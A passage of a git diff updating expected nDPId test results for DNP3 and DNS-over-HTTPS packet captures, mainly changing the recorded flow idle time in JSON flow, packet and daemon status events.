{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-data-len":7593,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":7,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1097513177295} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":543,"packets-processed":543,"total-skipped-flows":0,"total-l4-data-len":7788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1097513185107} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 543/543 diff --git a/test/results/dns_doh.pcap.out b/test/results/dns_doh.pcap.out index eb83844bf..34100eb85 100644 --- a/test/results/dns_doh.pcap.out +++ b/test/results/dns_doh.pcap.out 
@@ -1,12 +1,12 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1571089200789} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1571089200789,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1571089200789,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1571089200789,"flow_last_seen":1571089200789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1571089200789,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"} 
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 